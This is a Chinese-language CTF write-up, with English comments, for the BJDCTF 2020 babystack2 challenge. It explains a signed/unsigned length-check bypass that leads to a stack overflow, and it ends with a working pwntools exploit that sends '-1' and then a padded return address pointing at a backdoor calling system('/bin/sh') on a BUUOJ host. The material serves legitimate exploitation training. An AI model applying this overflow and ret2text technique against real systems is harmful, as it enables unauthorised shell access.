 # bjdctf 2020 babyrop2（注：下文 checksec 输出与 exp 中的路径显示实际分析的二进制文件为 bjdctf_2020_babystack2，标题中的 babyrop2 疑为笔误）
# 前提
# 查看文件保护
[*] '/root/pwn/buuctf/bjdctf_2020_babystack2/bjdctf_2020_babystack2'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
# 静态分析
主函数如下
// IDA pseudocode of main, reproduced verbatim (not compilable as-is: LODWORD/_bss_start are decompiler names).
// The vulnerability is a signed/unsigned mismatch: the length is range-checked as a signed int
// but handed to read() as an unsigned int, so a negative length bypasses the check and overruns buf.
int __cdecl main(int argc, const char **argv, const char **envp)
{
  char buf; // [rsp+0h] [rbp-10h]  -- 0x10 bytes below the saved rbp, 0x18 below main's return address
  size_t nbytes; // [rsp+Ch] [rbp-4h]  -- typed size_t by IDA but sits at rbp-4 (presumably a 4-byte int); both uses below truncate to 32 bits anyway
  // NOTE(review): _bss_start is IDA's label for the object at that address; presumably stdout — confirm in the binary.
  setvbuf(_bss_start, 0LL, 2, 0LL);
  setvbuf(stdin, 0LL, 1, 0LL);
  LODWORD(nbytes) = 0; // only the low dword is initialised; the high dword is never consulted (see the casts below)
  puts("**********************************");
  puts("*     Welcome to the BJDCTF!     *");
  puts("* And Welcome to the bin world!  *");
  puts("*  Let's try to pwn the world!   *");
  puts("* Please told me u answer loudly!*");
  puts("[+]Are u ready?");
  puts("[+]Please input the length of your name:");
  __isoc99_scanf("%d", &nbytes); // attacker-controlled: "%d" stores a 32-bit signed value into the low dword of nbytes
  // Upper bound only: the comparison is on the SIGNED 32-bit value, so any negative input (e.g. -1) passes.
  // (The page's exploit sends 2147483649, which only works because glibc stores the out-of-range %d value modulo 2^32.)
  if ( (signed int)nbytes > 10 )
  {
    puts("Oops,u name is too long!");
    exit(-1);
  }
  puts("[+]What's u name?");
  // ...but read() receives the UNSIGNED 32-bit value: -1 becomes 0xFFFFFFFF, so read() accepts as many bytes as
  // the client sends, running past buf over the saved rbp and the return address. checksec shows no stack canary,
  // so nothing detects the overrun before `ret`.
  read(0, &buf, (unsigned int)nbytes);
  return 0; // the ret here pops the attacker-supplied return address (ret2text to backdoor; NX is irrelevant for that)
}
backdoor函数如下
// Backdoor function present in the binary (IDA pseudocode, reproduced verbatim). Because the binary is
// No PIE, its address is fixed at link time, so the exploit can take it straight from the symbol table
// and plant it in main's overwritten return address (ret2text — no shellcode needed despite NX).
signed __int64 backdoor()
{
  system("/bin/sh"); // spawns a shell on the attacker's stdin/stdout once control lands here
  return 1LL;
}
# 思路分析
- 目前信息:
  - 控制 nbytes 即可实现任意长度数据写入
  - nbytes 被 `if` 判断限制在 10 以内（只有上界，没有下界）
  - `if` 判断 nbytes 时按有符号数（`(signed int)nbytes`）比较，`read` 时按无符号数（`(unsigned int)nbytes`）使用
  - 有后门函数 backdoor，直接调用 `system("/bin/sh")`
  - No PIE：后门地址固定；No canary：栈溢出覆盖返回地址不会被检测；NX 开启但 ret2text 不需要可执行栈
 
- 思路（控制 nbytes 绕过长度检查）:
  - 输入负数长度（如 -1）：有符号比较 `-1 > 10` 为假，绕过判断；`read` 收到的却是 `(unsigned int)-1 = 0xFFFFFFFF`，可读入远超 buf 的数据
  - buf 位于 rbp-0x10，先填充 0x10+8 字节覆盖 buf 与保存的 rbp，再写入 backdoor 地址覆盖 main 的返回地址
  - 利用有符号数和无符号数的区别，绕过判断，实现溢出劫持程序流到后门函数获得 shell
# exp
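from pwn import *

context(os='linux', arch='amd64', log_level='debug')
pwnfile = '/root/pwn/buuctf/bjdctf_2020_babystack2/bjdctf_2020_babystack2'

# Remote by default (unchanged behaviour); run `python exp.py LOCAL` to debug against the local copy
# instead of editing the script (pwntools' `args` comes from `from pwn import *`).
io = process(pwnfile) if args.LOCAL else remote('node4.buuoj.cn', 28880)
elf = ELF(pwnfile)

# No PIE, so the backdoor's address is fixed at link time and can be read straight from the symbol table.
backdoor_addr = elf.symbols['backdoor']

# buf sits at rbp-0x10 (see the decompiled main); the extra 8 bytes step over the saved rbp so the
# following qword lands on main's return address. No stack canary, so the overrun goes undetected.
offset = 0x10 + 8

# Length-check bypass: main compares nbytes as a signed int (rejects > 10) but passes it to read() as
# an unsigned int. -1 fails the signed check and becomes 0xFFFFFFFF for read(). The original sent
# 2147483649, which works only because glibc stores the out-of-range %d value modulo 2^32 (i.e. as
# -2147483647); -1 is well-defined and gives the same effect.
io.sendlineafter(b'your name:', b'-1')

# pwntools >= 4 expects bytes on the wire; flat() packs backdoor_addr as an 8-byte little-endian
# qword according to context.arch.
payload = flat([b'a' * offset, backdoor_addr])
# NOTE(review): if system() faults on a movaps/stack-alignment check with the target libc, return to a
# `ret` gadget first (or to backdoor_addr + 1 if backdoor starts with `push rbp`) so rsp is 16-byte
# aligned at the call — not needed on the original target according to this writeup.
io.sendlineafter(b'u name?\n', payload)
io.interactive()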
